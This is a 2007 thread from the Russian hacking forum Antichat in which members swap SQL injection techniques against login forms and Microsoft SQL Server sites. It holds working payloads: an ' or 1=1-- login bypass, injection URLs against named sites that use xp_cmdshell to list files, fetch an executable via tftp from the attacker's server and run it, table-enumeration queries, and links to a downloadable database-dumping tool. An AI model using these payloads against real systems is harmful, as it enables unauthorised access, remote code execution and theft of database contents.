ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.07.2007, 13:53
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

ява фильтрация обходитьсся на уровне посылки пакета.
Если нету ошибки то с чего ты взял что есть иньекция.
' or 1=1--

Придает иситаное значение передаваемому запросу так что или ты авторизуешься или нет.
 
Ответить с цитированием

  #12  
Старый 05.07.2007, 14:33
Аватар для Shred
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037

Репутация: 73
По умолчанию

Цитата:
Сообщение от [ cash ]  
ява фильтрация обходитьсся на уровне посылки пакета.
а если просто сохранить страничку и вырезать с неё ява скрипт блок, а потом просто запустить этот сохранённый фалик? Думаю так проще.
Цитата:
Сообщение от [ cash ]  
Если нету ошибки то с чего ты взял что есть иньекция.
дак в том, то и прикол, что нет ошибок и инъекции соответственно тоже, именно поэтому спрашивал может есть ещё какие-либо приёмы, кроме уже описанных
Цитата:
Сообщение от [ cash ]  
' or 1=1--
Придает иситаное значение передаваемому запросу так что или ты авторизуешься или нет.
у меня обычно такие запросы приводили не к авторизации, а просто к ошибке.
 
Ответить с цитированием

  #13  
Старый 05.07.2007, 14:45
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Цитата:
а если просто сохранить страничку и вырезать с неё ява скрипт блок, а потом просто запустить этот сохранённый фалик? Думаю так проще.
Просто перехватить пакет исправить данные и отправить дальше.

Цитата:
у меня обычно такие запросы приводили не к авторизации, а просто к ошибке.
Нет универсального способа.
 
Ответить с цитированием

  #14  
Старый 05.07.2007, 15:39
Аватар для Shred
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037

Репутация: 73
По умолчанию

Цитата:
Сообщение от [ cash ]  
Просто перехватить пакет исправить данные и отправить дальше.
этож нада знать как перехватывать, исправлять и передавать дальше

А всё таки не подскажешь, может известы ещё пару примеров, что можно втулить в форму авторизации?
 
Ответить с цитированием

Выполнение системных команд через Sql запрос
  #15  
Старый 09.07.2007, 13:38
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию Выполнение системных команд через Sql запрос

Тема которую почти никогда не затрагивают в статьях про MSSQL сервер от Microsoft.
При наличии соответствующих прав, хакер может выполнить произвольную команду.
Вот пример:
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'dir'--
Выводим список файлов и под-папок из текущей папки

Также можно залить любой файл на уязвимый сервер
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'tftp –i 127.0.0.1 get file.exe'--
127.0.0.1 - это сервер на котором лежит наш file.exe
и выполнить его
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'file.exe'--

Последний раз редактировалось _Pantera_; 09.07.2007 в 13:57..
 
Ответить с цитированием

  #16  
Старый 09.07.2007, 13:43
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'dir'

Че куда ты выведешь???
Запрос прервать коментариями не надо...

Короче почитал поржал...
 
Ответить с цитированием

  #17  
Старый 15.07.2007, 19:23
Аватар для dudits
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию

почему при выполнении подзапроса
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)
пишет ошибку
Incorrect syntax near the keyword 'top'.

в данном случае сайт

http://info.l2r.ru/?part=items&id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ta ble_name'+AND+COLUMN_NAME+NOT+IN+('column'))--
 
Ответить с цитированием

  #18  
Старый 23.07.2007, 14:28
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Exclamation

UPDATE!
Уневальсальный дампер для mssql через иньекцию.

http://slil.ru/24655320
http://www.rapidshare.ru/350872


Видео тут.
Собсвенно продолжение статьи и то о чем все просили.

http://hack-shop.org.ru/mssql.php

Последний раз редактировалось [ cash ]; 09.09.2007 в 23:08..
 
Ответить с цитированием

  #19  
Старый 08.08.2007, 00:13
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

UPDATE!
Официальный хелп от майкрософт по ADO (Jet Database). На русском.
http://support.microsoft.com/ph/1596
 
Ответить с цитированием

  #20  
Старый 14.08.2007, 12:40
Аватар для che_ha
che_ha
Новичок
Регистрация: 08.08.2007
Сообщений: 2
Провел на форуме:
8244

Репутация: 0
По умолчанию

А что делать если фильтрируюеться знак ( ' ) , а когда вожу запрос через char() выдает ошибку 'The char function requires 1 arguments' ??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Мнения: "Безопасность от Microsoft: шаг к обновленному миру?" dinar_007 Мировые новости 5 25.12.2006 19:20
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости 17 12.12.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ